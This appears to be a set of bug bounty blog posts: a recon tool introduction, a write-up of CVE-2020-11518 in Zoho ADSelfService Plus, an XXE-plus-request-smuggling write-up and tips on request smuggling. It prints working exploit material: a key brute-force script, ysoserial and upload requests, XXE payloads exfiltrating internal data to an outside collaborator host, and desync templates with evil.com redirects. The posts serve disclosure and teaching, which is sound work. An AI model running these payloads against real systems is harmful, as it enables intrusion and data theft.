Introducing BBRF: yet another Bug Bounty Reconnaissance Framework

An example use case of bbrf, here integrating with subfinder from projectdiscovery.io

Like anyone involved in bug bounty hunting, I have encountered a number of challenges in organizing my reconnaissance data over the years. In this article, I want to introduce the solution I have designed to address some of those headaches, hoping that it may prove useful to you in some way.

Get started

If you’ve stumbled on this article looking to get started with BBRF immediately, head over to the GitHub repo right away! If you’re interested in learning more about what it is (and what it ain’t), feel free to continue reading below.

What’s the problem?

When it comes to reconnaissance, or “recon”, in bug bounty hunting, it is clear that there is a lot of tooling available. Whereas five years ago, subdomain bruteforcing with fierce was all the recon I could muster, the community today has access to an abundance of very good tools that either specialize in very specific tasks (e.g. massdns), try to be amazing all-rounders (e.g. ffuf) or successfully combine a lot of submodules into one big framework (e.g. amass).

My biggest struggle when working with this growing variety of tools has always been staying organized. In particular, managing the output of different tools and combining them to enrich each other was cumbersome enough that I kept using tools on an ad-hoc basis. In other words, I would use tools for their specific purpose, interpret and use the output manually, and move on to the next one.

To overcome this problem in an attempt to be more structured, I started implementing bbrf, which first and foremost had to be a command-line tool allowing me to easily list all domains and IPs belonging to a project, and to store new ones for later use. In particular, I was longing to be able to run commands like bbrf domains and bbrf ips to list my data, and sublist3r.py | bbrf domain add - to store my results.

Architecture

To achieve the desired functionality, BBRF was designed as two separate components: the BBRF server, in the form of a central document store, and the BBRF client in the form of a Python script.

Document store

The document store, or BBRF server, is a central document-oriented database running on CouchDB. CouchDB comes with a standard HTTP-based API, which allows interacting with the database by means of HTTP requests. Data is stored in JSON documents, which has the advantage of not requiring any predefined data structure.
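To give an idea of what that interaction looks like, here is a minimal sketch (assuming a local CouchDB instance with a database called bbrf and placeholder credentials, all hypothetical) that fetches a document over the HTTP API:

import requests

# assumptions: a local CouchDB on the default port, a database
# called "bbrf", and placeholder credentials
COUCHDB = "http://localhost:5984"
AUTH = ("bbrf", "<password>")

# every document is addressable over plain HTTP by its identifier
resp = requests.get(COUCHDB + "/bbrf/www.example.com", auth=AUTH)
print(resp.json())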

At the time of publishing, the following document types are supported by default:

  • programs, including a list of inscope and outscope domains and a disabled flag;
  • domains, belonging to a program and containing a list of IPs they resolve to;
  • ips, belonging to a program and containing a list of corresponding domains;

Client

The BBRF client, on the other hand, can be thought of as a Python wrapper around the HTTP calls to the JSON database. It was built with simplicity in mind, according to the Unix adage to “do one thing and do it well”: its primary purpose is to output and digest domains and IP addresses, so that it plays well with other tools by piping input and output to and from the client.

# find all domains that contain "dev"
bbrf domains | grep 'dev'
# pipe all domains from subfinder into bbrf
bbrf program scope --wildcard --top | subfinder | bbrf domain add -

Features

Programs & Scopes

BBRF stores your recon data in programs, in line with how bug bounty platforms typically work. Create a new program with bbrf new and define both the inscope and outscope domains to get started:

$~ bbrf new test
$~ bbrf inscope add '*.example.com' 'www.example.com'
$~ bbrf outscope add 'blog.example.com'

Now every added domain will be checked against the known domains and the defined scope before being ingested into the central database:

$~ bbrf domain add 'test.example.com' 'blog.example.com' 'demo.example.com' 'test.example.com' 'www.example.org'
$~ bbrf domains
demo.example.com
test.example.com
# note that out-of-scope domains and duplicates have been omitted

Collaboration & Distribution

Because of the central database, you can install a client on any number of machines and configure them to point to the same BBRF server. This allows you to run daily cron jobs on your VPS in the cloud, and readily access their output from your local workstation. Or to collaborate with other bug bounty hunters, and always work with the same recon data, independent of where it came from or who discovered it.

The central repository allows you to build your workflows around data that is synced across multiple devices and users.

Extensibility

Since all information is written to JSON documents, the data format can be easily modified. Anything that can be represented in JSON can be stored in a new JSON document, or appended as an attribute to existing programs, domains or IPs. This would allow, for example, to also store a list of identified URLs, open ports, file hashes, full HTTP responses, etc. These changes would not require any modification on the server side, except for additional views if the data needs to be indexed and queried. In the Python client, a number of simple changes and additions would allow interacting with that data from the command line.
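As a minimal sketch of how little such an extension would take (reusing the hypothetical CouchDB instance and credentials from the earlier sketch), the following appends a custom urls attribute to an existing domain document; CouchDB only requires that the document’s current _rev is included when writing it back:

import requests

COUCHDB = "http://localhost:5984"  # hypothetical instance, as before
AUTH = ("bbrf", "<password>")

# fetch the existing document, including its current _rev
doc = requests.get(COUCHDB + "/bbrf/www.example.com", auth=AUTH).json()
# append an attribute the default data model knows nothing about
doc["urls"] = ["https://www.example.com/login", "https://www.example.com/api"]
# write the extended document back; no server-side changes required
requests.put(COUCHDB + "/bbrf/www.example.com", json=doc, auth=AUTH)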

All other features of CouchDB can be leveraged on your BBRF server. For example, think of user-based access control, data replication across multiple servers, the Fauxton interface to interact with your data through an admin panel, or the ability to write a custom dashboard to visualize your recon data.

AWS Lambda (aka Cloud Magic)

BBRF comes with a Serverless configuration file that makes it easy to deploy a BBRF instance to AWS Lambda out of the box. This allows you to interact with the central repository from your micro services running in the cloud:

curl https://abc.execute-api.us-east-1.amazonaws.com/dev/bbrf -d 'task=domains -p vzm'

I have used this to save the results from a number of agents deployed to their own Lambdas, which regularly run recon scripts in the AWS cloud to aggregate data from sources such as crt.sh, dnsgrep and Sublist3r.

The Power of JSON

Because of its architecture, BBRF stores all data as raw JSON. BBRF supports querying any JSON document by its identifier, which allows you to quickly inspect the stored information from your command line:

$~ bbrf show example | jq
{
  "_id": "example",
  "_rev": "11-e7a49b214e37e5cc890a3620fde8a0c5",
  "outscope": [
    "blog.example.com"
  ],
  "passive_only": false,
  "type": "program",
  "inscope": [
    "*.example.com",
    "www.example.com"
  ],
  "disabled": false
}
$~ bbrf show www.example.com | jq
{
  "_id": "www.example.com",
  "_rev": "1-1c63d262fd46ace7f8eeb0fdd5370d07",
  "ips": [],
  "program": "example",
  "type": "domain"
}

What it ain’t

BBRF does not intend to be another all-in-one recon automation tool. Instead, it aims to provide a simple interface to integrate with the existing tools you already know and love, and to allow sharing your results across devices.

Neither was it designed to ingest every type of data, and transform it into a uniform dataset. By default, bbrf will only process domains and IPs that are piped to it in newline-separated form and in plaintext format.

At the time of publishing, bbrf only supports domains and IPs, which means there are a number of known limitations:

  • No support for URLs;
  • No support for ports and services;
  • No support for IPv6;

Feedback

I really hope this project can help you overcome some of the issues you are facing, in the same way it has helped me over the time that I have been using it. And I really look forward to seeing more people adopt this in their day-to-day workflows.

However, since I have never held a developer role (and my coding consequently is pretty rubbish), I expect there may be some feedback about bugs you will inevitably encounter, or features that you believe are missing. In that case, please turn to the GitHub issues page or create a new Pull Request and hopefully we can sort things out!

CVE-2020-11518: how I bruteforced my way into your Active Directory

Last May, I discovered that a critical vulnerability I had reported earlier this year had resulted in my first CVE. Since the combination of vulnerabilities that led to this unauthenticated remote code execution (RCE) was pretty fun to discover, I want to share the story about how brute force enabled me to hack into two organizations’ Active Directory-linked systems.

The Target

While performing some routine visual reconnaissance with Aquatone, I noticed a similar-looking login page on two different subdomains from unrelated bug bounty programs.

Both subdomains contained customized versions of this default login screen.

The software behind this login screen is Zoho ManageEngine ADSelfService Plus, which offers a portal that allows users to reset the password of their own Active Directory (AD) accounts. (Anybody who has worked in a large organization will recognize why this sounds like a useful thing to have.)

Since I figured that any bugs I would find on this product could potentially impact multiple companies, and more so because it sounded very likely that it was linked to the organization’s Active Directory, it seemed like a good idea to spend some time here.

My first efforts led to discovering a few basic reflected Cross-Site Scripting (XSS) vulnerabilities, which had apparently been identified by other researchers already. So I had to dig a little deeper. Luckily, it turned out the whole product can be downloaded and installed as a trial for 30 days.

The Setup

Since I was convinced there would probably be more XSS vulnerabilities to find, I decided to download and install the software with the idea of browsing through the Java source code looking for more bugs.

Having installed the software, I now had the advantage of being able to execute all tests locally, as well as read through the source code to understand exactly what happens in the application, and even use grep in the installation folder to find potentially interesting files.

Sidenote

To reverse engineer Java applications, I like to use Bytecode Viewer, which decompiles and formats Java class files into readable Java code. It also allows you to edit bytecode and recompile files on the fly, and it works great for decompiling Android APK files too.

I started off manually browsing through some of the Java source files without many interesting discoveries. However, I did build an understanding of the software components and how they work together. This tends to be invaluable when looking for complex bugs in applications, so was definitely worth spending a couple of hours on. As a result, I had a pretty good picture of application features, the parts of the application that consisted mostly of legacy code vs. the parts that looked more recent, the parts that had been modified to fix previous security vulnerabilities, etc.

At one point, I decided to build a word list of application endpoints, which could hopefully serve two purposes: to perform some “classic” security tests directly against the endpoint, and to serve as a useful resource when targeting similar applications at some point in the future.

The Bugs

1. Insecure deserialization in Java

During my enumeration of the application’s endpoints, I spotted the following lines in one of the web.xml files:

<servlet-mapping>
    <servlet-name>CewolfServlet</servlet-name>
    <url-pattern>/cewolf/*</url-pattern>
</servlet-mapping>

When I googled that, I found a published RCE against a cewolf endpoint on another ManageEngine product, using a path traversal in the img parameter – this looked very promising!

Sure enough, after manually placing a file in a folder on my local installation, I could confirm that the deserialization vulnerability also existed in this version of ADSelfService Plus by browsing to http://localhost:8888/cewolf/?img=/../../../path/to/evil.file

This meant I had a ready-to-use Java deserialization vulnerability on the targeted sites, but I would only be able to exploit it if I found a way to upload arbitrary files to the server first. So the work wasn’t quite done yet.

2. Arbitrary file upload

Finding an arbitrary file upload vulnerability did not look like an easy challenge. To maximize my attack surface, I continued to configure the software on my machine, which required setting up a local Domain Controller and an Active Directory domain to play with.

Fast forward through hours of downloading ISOs, making space on HDDs, VMware Workstation shenanigans, Microsoft Windows Server administration and watching Youtube videos with titles like “How to Set Up a Windows Server 2019 Domain Controller“, and I finally had a setup that allowed me to log in to the admin panel.

I finally set up a working copy of ADSelfService Plus: time to hack.

With full admin access to the application, I could now further map out application features and API endpoints. For obvious reasons, I spent most of my time investigating all different upload features in the application, until I came across one feature that supported uploading a smartcard certificate configuration, resulting in a POST request to /LogonCustomization.do?form=smartCard&operation=Add

When I noticed that the uploaded certificate file was stored on the server’s file system without modifying the name, I figured that this might be the way forward to leverage the deserialization bug! So I traced this API call through the source code to find out more about possible ways to attack this.

On a high level, this is how that worked:

  1. A logged-in administrator can upload a smartcard configuration to /LogonCustomization.do?form=smartCard&operation=Add;
  2. This triggers a backend request to the server’s authenticated RestAPI on /RestAPI/WC/SmartCard?HANDSHAKE_KEY=secret using a secret handshake that is generated on the server side;
  3. Before executing the requested action, the HANDSHAKE_KEY is validated against a second API endpoint on /servlet/HSKeyAuthenticator?PRODUCT_NAME=ManageEngine+ADSelfService+Plus&HANDSHAKE_KEY=secret which returns SUCCESS or FAILED depending on the passed secret;
  4. If successful, the uploaded certificate is written to C:\ManageEngine\ADSelfService Plus\bin

Interestingly, the /RestAPI endpoint was publicly accessible, so any request with a valid HANDSHAKE_KEY would bypass user authentication and be processed by the server.

Furthermore, the /servlet/HSKeyAuthenticator was also publicly accessible, allowing an unauthorized user to manually verify if an authentication secret was valid or not.
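In other words, a candidate key could be verified with a single unauthenticated request. A quick sketch of such a check against a local instance (the helper function below is hypothetical):

import requests

def is_valid_key(candidate):
    # the authenticator servlet is publicly accessible and simply
    # returns SUCCESS or FAILED for any candidate key
    r = requests.post(
        "http://localhost:8888/servlet/HSKeyAuthenticator",
        params={
            "PRODUCT_NAME": "ManageEngine ADSelfService Plus",
            "HANDSHAKE_KEY": candidate,
        },
    )
    return "SUCCESS" in r.text

print(is_valid_key("1585552472158"))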

With this in mind, I returned to the now familiar source code.

3. Bruteforceable authentication key

I identified two interesting Java classes with some help from grep, and from my installation’s PostgreSQL database that contained a useful inventory of API endpoints and their authentication needs:

Another benefit to local installations of software is full access to the underlying database.

A snippet from HSKeyAuthenticator.class in com.manageengine.ads.fw.servlet:

public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
      try {
         String message = "FAILED";
         RestAPIKey.getInstance();
         String apiKey = RestAPIKey.getKey();
         String handShakeKey = request.getParameter("HANDSHAKE_KEY");
         if (handShakeKey.equals(apiKey)) {
            message = "SUCCESS";
         }

         PrintWriter out = response.getWriter();
         response.setContentType("text/html");
         out.println(message);
         out.close();
      } catch (Exception var7) {
         HSKeyAuthenticator.out.log(Level.INFO, " ", var7);
      }

   }

And one from RestAPIKey.class in package com.manageengine.ads.fw.api:

  public static void generateKey()
  {
    Long cT = Long.valueOf(System.currentTimeMillis());
    key = cT.toString();
    generatedTime = cT;
  }

  public static String getKey()
  {
    Long cT = Long.valueOf(System.currentTimeMillis());
    if ((key == null) || (generatedTime.longValue() + 120000L < cT.longValue()))
    {
      generateKey();
    }
    return key;
  }

As you can see from those pieces of code, the API authentication key of the server is set to the current time in milliseconds and has a lifespan of 2 minutes. This means that at any given moment, there are 120 000 possible authentication keys (120 seconds * 1000 milliseconds/second).

In other words, if I could generate at least 1000 requests per second consistently over a time span of 2 minutes, I would have a guaranteed hit the moment the authentication key expired and regenerated. While that seems like a large number for a network-level attack, a successful attack is not necessarily beyond the realm of possibility, especially keeping in mind that even at a success rate below 100%, a hit becomes more and more likely given sufficient time.
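As a back-of-the-envelope sketch (not the actual exploit), the guessing strategy boils down to continuously trying millisecond timestamps in a window around the current time; the fraction of the key space you cover is dictated by your request rate:

import time
from itertools import islice

RPS = 1000  # sustained requests per second; 1000 is the ideal case

def candidate_keys():
    # yield millisecond timestamps in a window of RPS ms centered on
    # "now"; at 1000 rps this covers every possible fresh key, and at
    # lower rates a proportional fraction of the key space
    while True:
        now = int(time.time() * 1000)
        for candidate in range(now - RPS // 2, now + RPS // 2):
            yield str(candidate)

# the first few candidates you would feed to the authenticator endpoint
print(list(islice(candidate_keys(), 5)))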

In practice, I quickly had a working proof-of-concept that would brute force my local instance’s secret in a matter of minutes.

Brute forcing the secret on my local instance worked a charm.

However, when employing the script against a live target (i.e. over an actual internet connection), I wasn’t as lucky. I ran and reran the script with different configurations and settings for hours and overnight without result, and was starting to fear my approach would have to be abandoned.

Furthermore, I got temporarily sidetracked because I wasn’t sure what time zone my target servers were running in. I ended up rerunning my script with multiple offsets from my own (CET) until I found out that Java’s currentTimeMillis apparently returns time in Coordinated Universal Time (UTC), and I needn’t have bothered.

Eventually, after more trial and error, I landed on the following Turbo Intruder script, which, based on the actual number of requests per second (rps) it could achieve, tried every candidate key within rps/2 milliseconds before and after the current timestamp. This provided reasonable coverage and minimized potential blind spots:

import time

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=20,
                           requestsPerConnection=200,
                           pipeline=True,
                           timeout=2,
                           engine=Engine.THREADED
                           )
    engine.start()
    # this is about the number of requests per second I could generate
    # from my test server, so not quite the ideal 1000 per second
    rps = 400

    while True:
        # try every candidate timestamp in a window of rps/2 milliseconds
        # before and after the current time
        now = int(round(time.time() * 1000))
        for i in range(now + rps // 2, now - rps // 2, -1):
            engine.queue(target.req, str(i))

def handleResponse(req, interesting):
    if 'SUCCESS' in req.response:
        table.add(req)

And moving the HTTP request to a file base.txt to prepare the attack with a headless Turbo Intruder:

POST /servlet/HSKeyAuthenticator?PRODUCT_NAME=ManageEngine+ADSelfService+Plus&HANDSHAKE_KEY=%s HTTP/1.1
Host: localhost:8888
Content-Length: 0
Connection: keep-alive

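With the script saved next to base.txt (the file name brute.py below is hypothetical), a headless run looks roughly like this, following the invocation format from the Turbo Intruder README:

java -jar turbo-intruder-all.jar brute.py base.txt http://localhost:8888 ignored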

All I needed now was a little bit of patience and a great deal of luck.

Brute forcing a secret timestamp with Turbo Intruder

Wham! I love it when theory comes true. As expected and despite my doubts, the authentication key could successfully be brute forced, even with a much lower throughput than the ideal 1000 requests per second (note in the screenshot that the attack against the live target averaged only 56 rps)!

The Exploit

Now, with all ingredients ready, the final exploit was trivial.

I generated a bunch of Java payloads with the deserialization framework ysoserial, and found out that the following worked:

java -jar ysoserial-master-SNAPSHOT.jar MozillaRhino1 "ping ping-rce-MozillaRhino1.<your-burp-collaborator>"

Next, I brute forced the authentication key with my script from above, and used it to upload the ysoserial payload to the server via the authenticated RestAPI:

POST /RestAPI/WC/SmartCard?mTCall=addSmartCardConfig&PRODUCT_NAME=ManageEngine+ADSelfService+Plus&HANDSHAKE_KEY=1585552472158 HTTP/1.1
Host: localhost:8888
Content-Length: 2464
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxkQ2P09dvbuV1Pi4
Connection: close

------WebKitFormBoundaryxkQ2P09dvbuV1Pi4
Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="pieter.evil"
Content-Type: text/xml

<binary-ysoserial-payload-here>
------WebKitFormBoundaryxkQ2P09dvbuV1Pi4
Content-Disposition: form-data; name="CERTIFICATE_NAME"

blah
------WebKitFormBoundaryxkQ2P09dvbuV1Pi4
Content-Disposition: form-data; name="SMARTCARD_CONFIG"

{"SMARTCARD_PRODUCT_LIST":"4"}
------WebKitFormBoundaryxkQ2P09dvbuV1Pi4--

And to finish things off, I issued a simple GET request to /cewolf/?img=/../../../bin/pieter.evil and saw the most beautiful notification in the world:

Hacker’s delight: a DNS lookup request as a result of a successful Java deserialization attack.

The Outcome

Armed with a chain of vulnerabilities that led to RCE on an AD-connected server, I argued that an attacker might abuse the link with the Domain Controller to hijack domain accounts or create new accounts on the AD domain, leading to much wider access into the companies’ internal networks, e.g. by accessing internal services via their public VPN portals.

I submitted the vulnerability reports for both companies, one of which was rewarded as Critical, the other of which was categorized as High due to it being a vendor security issue without an available patch (0-day).

Timeline

  • 26/Mar/2020 – Installed a local version of the software;
  • 30/Mar/2020 – Reported the RCE chain to company one;
  • 31/Mar/2020 – Reported the RCE chain to company two;
  • 2/Apr/2020 – Submitted the vulnerability information to Zoho’s in-house bug bounty program;
  • 3/Apr/2020 – Zoho published a security update on their website and pushed a patch in release 5815;
  • 3/Apr/2020 – Company two awarded a bounty as Critical and patched their installation;
  • 12/Apr/2020 – Company one awarded a bounty as High and removed public access to their installation

XXE-scape through the front door: circumventing the firewall with HTTP request smuggling

In this write-up, I want to share a cool way in which I was able to bypass firewall limitations that were stopping me from successfully exploiting an XML External Entity injection (XXE) vulnerability. By combining the XXE with a separate HTTP request smuggling vulnerability, I was able to grab some secret information and escape through the front door. Let’s go!

A fire escape, because this write-up is about escaping a firewall. It’s a little joke.

The Hole in the Wall

The story starts when Burp Suite pointed out that a file upload endpoint was parsing the embedded XML in some image file formats, which it was able to determine because the embedded external entities triggered a DNS request to the Burp Collaborator.

The generated report by the excellent UploadScanner extension for Burp Suite.

Funnily enough, this report had been sitting in my Burp project file for more than two months before I finally noticed it. When I did, I quickly started playing with the payloads to see if I could verify this finding, and maybe trigger an HTTP request rather than DNS only.

Sidenote

When exploiting an XXE vulnerability, it is important that you can reference your own external Document Type Definition (DTD) file. While internal DTD declarations are possible, they do not typically allow the advanced markup that makes an XXE attack so powerful. To reference an external DTD file, outgoing HTTP request traffic should be allowed.

In my earlier post “From blind XXE to root-level file read access“, I explain this limitation and another way to circumvent the limitation of a firewall that blocked outgoing HTTP traffic.

Too bad. I found myself unable to trigger outgoing HTTP requests using any of the tricks that had worked for me in similar scenarios before: I couldn’t find an unpatched Jira to serve as a proxy, nor was the gopher protocol enabled to try and leverage existing proxy servers on the company network.

So if I’m unable to include a remote DTD file, what options do I have? Lucky for me, this excellent research by Arseniy Sharoglazov shows that you can achieve the same advanced markup of an external DTD by embedding variables in DTD files that exist on the local file system.

By leveraging this technique, and the extended work by GoSecure, I was able to confirm the existence of a local DTD C:\Windows\System32\wbem\xml\wmi20.dtd which already provided us with a solid proof of concept:

<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\wmi20.dtd">

    <!ENTITY % CIMName '>
        <!ENTITY % file "testtesttest">
        <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'https://%file;.wvv4l1hdkvwdd1bnpnoqomnuclib60.burpcollaborator.net/'>">
        %eval;
        %error;
        <!ELEMENT aa "bb"'>

    %local_dtd;
]>
<message></message>

If that looks complicated, that’s because it is. For readability purposes, the above is essentially equivalent to an external DTD with the following content:

<!ENTITY % file "testtesttest">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'https://%file;.wvv4l1hdkvwdd1bnpnoqomnuclib60.burpcollaborator.net/'>">
%eval;
%error;

In other words, the following happens:

  1. Define a parameter entity %file; with value "testtesttest";
  2. Define a parameter entity %eval that combines the first variable into a string to define an external entity %error; to…
  3. …try and access the resource (note the SYSTEM keyword) at location https://testtesttest.wvv...burpcollaborator.net
  4. By “printing” %eval; and %error;, their respective values are included in the DTD, resulting in:
    1. the definition of %error; coming to life, and
    2. referencing it so its external resource is fetched, so its content can be included;

As a result, lo and behold, the string testtesttest is appended with the rest of the URL, and shows up in the external DNS lookup towards our Burp Collaborator.

At this point, I started looking for some internally accessible information that could be leaked as part of a domain name (i.e. strings without newlines, consisting only of alphanumerics, dots, and dashes) and was lucky to find a web service that returned the simple string "none":

<!ENTITY % file SYSTEM "https://internal.company.com/api/endpoint">
% eval "<!ENTITY % error SYSTEM 'https://%file;.wvv4l1hdkvwdd1bnpnoqomnuclib60.burpcollaborator.net/'>">
%eval;
%error;

This resulted in a DNS lookup to none.wvv4l1hdkvwdd1bnpnoqomnuclib60.burpcollaborator.net, demonstrating we could leak internal information to an outside attacker.

While the leaked information is utterly useless and could not reasonably be considered sensitive, I considered this POC sufficient to be reported. But my thirst for impact was not quite quenched. So I reported the issue, and I kept digging!

The Great Escape

I cannot remember everything I tried, but eventually, I had the idea to get a list of all the domains in the program’s scope and use them in an Intruder attack as part of the XXE payload. In doing so, I wanted to determine if any of the domains maybe resolved to internal IP addresses on the internal network and might lead to exfiltrating more interesting data from endpoints that weren’t blocked by the firewall.

In order to determine which URLs were resolving and accessible from the vulnerable server, I modified the previous payload as follows (simplified):

<!ENTITY % file SYSTEM "http://www.google.com">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'https://%file;.<burp-collaborator-url>/'>">
<!ENTITY % checkpoint SYSTEM "http://canary.<burp-collaborator-url>">
%checkpoint;
%eval;
%error;

If I now received an incoming DNS request on canary.<burp-collaborator-url>, that meant the file location (in this case http://www.google.com) was successfully contacted; whereas if I didn’t, that meant an error was thrown before the canary could be resolved. This was easily verified with local paths like file:///C:\Windows\win.ini and file:///C:\idontexist.
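To feed the Intruder attack, one payload per candidate origin will do. A hypothetical templating sketch along these lines generates them from a list of in-scope domains (file name and placeholders are assumptions):

# hypothetical sketch: generate one XXE probe per in-scope domain
TEMPLATE = """<!ENTITY % file SYSTEM "{origin}">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'https://%file;.{collab}/'>">
<!ENTITY % checkpoint SYSTEM "http://canary.{collab}">
%checkpoint;
%eval;
%error;"""

collab = "<burp-collaborator-url>"  # placeholder, as above
with open("scope-domains.txt") as f:  # assumed: one domain per line
    for domain in f.read().splitlines():
        print(TEMPLATE.format(origin="https://" + domain, collab=collab))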

As a result, I now knew that the firewall on the network was blocking HTTP requests to almost everywhere, but not to a number of domains of the format *.external.company.com. What made this particularly interesting is that a few of these whitelisted domains were flagged by the HTTP request smuggler plug-in as vulnerable. This suddenly sounded very promising!

Sidenote

HTTP request smuggling vulnerabilities can be tricky to exploit. Read my article “HTTP Request Smuggling – 5 Practical Tips” for things you can look for to demonstrate impact.

After conscientiously working through each of the vulnerable hosts and a lot of trial and error, I found one useful application where I could leverage the HTTP request smuggling vulnerability. The server ran an application with an endpoint to save profile information: this made it possible to store and read smuggled requests by sending a desynchronizing request like this:

POST /app/ HTTP/1.1
 Transfer-Encoding: chunked
Host: ext.company.com
Content-Length: 136
Pragma: no-cache

2
{}
0

POST /app/SaveProfile HTTP/1.1
Host: ext.company.com
Cookie: attacker_session_cookie
Content-Length: 100

Description=XXX

When sending this HTTP request to the vulnerable web server, the desync resulted in the next HTTP request to the server (possibly from a random visitor) being appended to the POST body of the poisoned request:

POST /app/SaveProfile HTTP/1.1
Host: ext.company.com
Cookie: attacker_session_cookie
Content-Length: 100

Description=XXXABGET / HTTP/1.1\r\nHost: ext.company.com[...]

Since I could use my attacker’s session cookie in the poisoned request, I could now go and read the smuggled request in the description of my own profile!

Interestingly, because this vulnerability only existed on the HTTP layer of the application (port 80) and not on HTTPS (port 443), this vulnerability in itself was of low impact because hardly any real-life users would have their requests poisoned in a successful attack. However, by combining it with the XXE I was working on, the proverbial whole quickly became more than the sum of its parts.

By poisoning the back-end’s HTTP layer and quickly following this by sending an XML payload that would trigger the poisoned request, it was possible to construct a payload that allowed me to read sensitive information by sending it to the description of my profile on the whitelisted application (simplified for readability):

<!ENTITY % file SYSTEM "http://127.0.0.1/api/secret">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'http://ext.company.com/exfiltrate-via-smuggling-%file;'>">
%eval;
%error;

This concatenated the value read from http://127.0.0.1/api/secret and issued a request to http://ext.company.com/exfiltrate-via-smuggling-<token>, which we could successfully poison. The result was beautiful:

The exfiltrated data was available in my profile description as a result of the successful request smuggling attack.

I reported these as two different vulnerabilities and demonstrated the combined impact in one of the two. I argued that the combined impact was critical, but eventually the company awarded it as “High” and added a bonus as a token of appreciation.

Lessons learned

  • The applications of HTTP request smuggling are varied;
  • If you can only exfiltrate information via DNS, you may want to keep digging;

Timeline

  • 19/Dec/2019 – Reported the XXE with a simple POC;
  • 20/Dec/2019 – Reported the request smuggling vulnerability;
  • 20/Dec/2019 – Updated the XXE report with a POC combining the two reports to demonstrate leaking sensitive data;
  • 2/Jan/2020 – HTTP request smuggling report triaged;
  • 6/Jan/2020 – XXE report triaged after providing a video of the attack in action since it was difficult for triage to reproduce;
  • 8/Jan/2020 – Bounty awarded for request smuggling as Medium criticality;
  • 8/Jan/2020 – Bounty awarded for XXE as High criticality;
  • 29/Feb/2020 – Requested permission to publish write-up;
  • 18/Mar/2020 – Permission granted.

HTTP Request Smuggling – 5 Practical Tips

When James Kettle (@albinowax) from PortSwigger published his ground-breaking research on HTTP request smuggling six months ago, I did not immediately delve into the details of it. Instead, I ignored what was clearly a complicated type of attack for a couple of months until, when the time came for me to advise a client on their infrastructure security, I figured I had better make sure I understood what all the fuss was about.

Since then, I have been able to leverage the technique in a number of nifty scenarios with varying results. This post focuses on a number of practical considerations and techniques that I have found useful when investigating the impact of the attack against servers and websites that were found to be vulnerable. If you are unfamiliar with HTTP request smuggling, I strongly recommend you read up on the topic first, starting with James Kettle’s original research, in order to better understand what follows below.

Recap

As a recap, there are some key topics that you need to grasp when talking about request smuggling as a technique:

  1. Desynchronization

At the heart of an HTTP request smuggling vulnerability is the fact that two communicating servers are out of sync with each other: upon receiving an HTTP request message with a maliciously crafted payload, one server will interpret the payload as the end of the request and move on to the “next HTTP request” that is embedded in the payload, while the second will interpret it as a single HTTP request, and handle it as such.

  2. Request Poisoning

As a result of a successful desynchronization attack, an attacker can poison the response of the HTTP request that is appended to the malicious payload. For example, by embedding a smuggled HTTP request to a page evil.html, an unsuspecting user might get the response of the evil page, rather than the actual response to a request they sent to the server.

  3. Smuggling result

The result of a successful HTTP smuggling attack will depend heavily on how the server and the client respond to the poisoned request. For example, a successful attack against a static website that hosts a single image file will have a very different impact than successfully targeting a dynamic web application with thousands of concurrent active users. To some extent, you might be able to control the result of your smuggling attack, but in some cases you might be unlucky and need to conclude that the impact of the attack is really next to none.

Practical tips

By and large, I can categorize my experiences with successful request smuggling attacks in two categories: exploiting the application logic, and exploiting server redirects.

When targeting a vulnerable website with a rich web application, it is often possible to exfiltrate sensitive information through the available application features. If any information is stored for you to retrieve at a later point in time (think of a chat, a profile description, logs, ...), you might be able to store full HTTP requests in a place where you can later read them.

When leveraging server redirects, on the other hand, you need to consider two things to build a decent POC: a redirect needs to be forced, and it should point to an attacker-controlled server in order to have an impact.

Below are five practical tips that I found useful in determining the impact of an HTTP request smuggling vulnerability.

#1 – Force a redirect

Before even trying to smuggle a malicious payload, it is worth establishing what payload will help you achieve the desired result. To test this, I typically end up sending a number of direct requests to the vulnerable server, to see how it handles edge cases. When you find a request that results in a server redirect (HTTP status code 30X), you can move on to the next step.

Some tests I have started to incorporate in my routine when looking for a redirect are:

  • /aspnet_client on Microsoft IIS will always append a trailing slash and redirect to /aspnet_client/
  • Some other directories that tend to do this are /content, /assets, /images, /styles, …
  • Often HTTP requests will redirect to HTTPS
  • I found one example where the path of the Referer header was used as the redirect target, i.e. Referer: https://www.company.com//abc.burpcollaborator.net/hacked would redirect to //abc.burpcollaborator.net/hacked
  • Some sites will redirect all files with certain file extensions, e.g. test.php to test.aspx

#2 – Specify a custom host

Once you have found a request that results in a redirect, the next step is to determine whether you can force it to redirect to a different server. I have been able to achieve this by trying each of the following:

  • Override the hostname that the server will parse in your smuggled request by including any of the following headers and investigating how the server responds to them:
    • Host: evil.com
    • X-Host: evil.com
    • X-Forwarded-Host: evil.com
  • Similarly, it might work to include the overridden hostname in the first line of the smuggled request: GET http://evil.com/ HTTP/1.1
  • Try illegally formatting the first line of the smuggled request: GET .evil.com HTTP/1.1 will work if the server appends the URI to the existing hostname: Location: https://vulnerable.com.evil.com

#3 – Leak information

Regardless of whether you were able to issue a redirect to an attacker-controlled server, it’s worth investigating the features of the application running on the vulnerable server. This heavily depends on the type of application you are targeting, but a few pointers of things you might look for are:

  • Email features – see if you can define the contents of an email of which you receive a copy;
  • Chat features – if you can append a smuggled request, you may end up reading the full HTTP request in your chat window;
  • Update profile (name, description, …) – any field that you can write and read could be useful, as long as it allows special and new-line characters;
  • Convert JSON to a classic POST body – if you want to leverage an application feature, but it communicates via JSON (e.g. {"a":"b", "c":"3"}), see if you can change the encoding to a classic a=b&c=3 format with the header Content-Type: application/x-www-form-urlencoded.

#4 – Perfect your smuggled request

If you are facing issues when launching a smuggling attack, and you don’t see your expected redirect but are getting unexpected error codes instead (e.g. 400 Bad Request), you may need to put some more information in your smuggled request. Some servers fail when they cannot find the elements they expect in an HTTP request. Here are some things that sometimes work:

  • Define Content-Length and Content-Type headers;
  • Ensure you set Content-Type to application/x-www-form-urlencoded if you are smuggling a POST request;
  • Play with the content length of the smuggled request. In a lot of cases, by increasing or decreasing the smuggled content length, the server will respond differently;
  • Switch GET requests to POST, because some servers don’t like GET requests with a non-zero length body;
